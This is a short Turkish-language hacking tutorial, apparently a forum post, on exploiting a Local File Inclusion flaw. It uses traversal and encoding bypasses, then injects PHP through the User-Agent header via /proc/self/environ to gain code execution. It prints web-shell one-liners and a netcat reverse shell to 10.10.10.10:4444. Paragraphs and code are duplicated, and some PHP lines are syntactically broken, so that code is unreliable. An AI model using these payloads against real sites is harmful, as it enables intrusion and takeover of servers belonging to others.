- 15 Ocak 2019
- 303
- 71
Merhaba, LFİ zafiyeti yanlış yapılandırılmış ve kontrol edilmeyen dosya çağırma sistemlerinden meydana geliyor. Test etmek için ../ gibi dizin çıkartma işlemleri kullanılabilir. Bunlarla beraber double url encodeing işlemleri veya sunucuyu yanıltmak için ....//....// gibi yollar tercih edilip null byte injection yöntemleri uygulanabilir.
Site üzerinde herhangi bir koruma mekanizması v.s yok bunun için işin içinde php:///filter gibi yöntemler katmadan /self/environ üzerinde bilgi çıkartacağım.
Şimdi ise veri çıkartabileceğimiz noktaya değinelim, User-Agent: bilgisinde duran mozilla kısmını siliyorum bunun yerinde kendi php kodumu çalıştırıyorum. Bu sayede sistem içinde belki eval kullanarak belki ; shell_exec | shell | gibi php de kullanabileceğimiz verilerden rce alabiliriz.
Bunlarla beraber sistemde kod okuyabilir, yazabilir hatta reverse shell alabilirsiniz, eğer ki lfi methodunda expect:/// çalışıyorsa direk okuyabilirsiniz bunlarla beraber;
<?php system($_GET['c']); ?>
<?php system($_REQUEST['c']$); ?>
<?php $os = shell_exec('id'); echo "<pre>$os</pre>"; ?>
$os = shell_exec('nc 10.10.10.10 4444 -e /bin/bash'); ?>
Site üzerinde herhangi bir koruma mekanizması v.s yok bunun için işin içinde php:///filter gibi yöntemler katmadan /self/environ üzerinde bilgi çıkartacağım.
![fuNoEj.png](https://resmim.net/cdn/2024/05/22/fuNoEj.png)
Şimdi ise veri çıkartabileceğimiz noktaya değinelim, User-Agent: bilgisinde duran mozilla kısmını siliyorum bunun yerinde kendi php kodumu çalıştırıyorum. Bu sayede sistem içinde belki eval kullanarak belki ; shell_exec | shell | gibi php de kullanabileceğimiz verilerden rce alabiliriz.
![zYzbod.png](https://mutluresim.com/images/2024/05/22/zYzbod.png)
Bunlarla beraber sistemde kod okuyabilir, yazabilir hatta reverse shell alabilirsiniz, eğer ki lfi methodunda expect:/// çalışıyorsa direk okuyabilirsiniz bunlarla beraber;
<?php system($_GET['c']); ?>
<?php system($_REQUEST['c']$); ?>
<?php $os = shell_exec('id'); echo "<pre>$os</pre>"; ?>
$os = shell_exec('nc 10.10.10.10 4444 -e /bin/bash'); ?>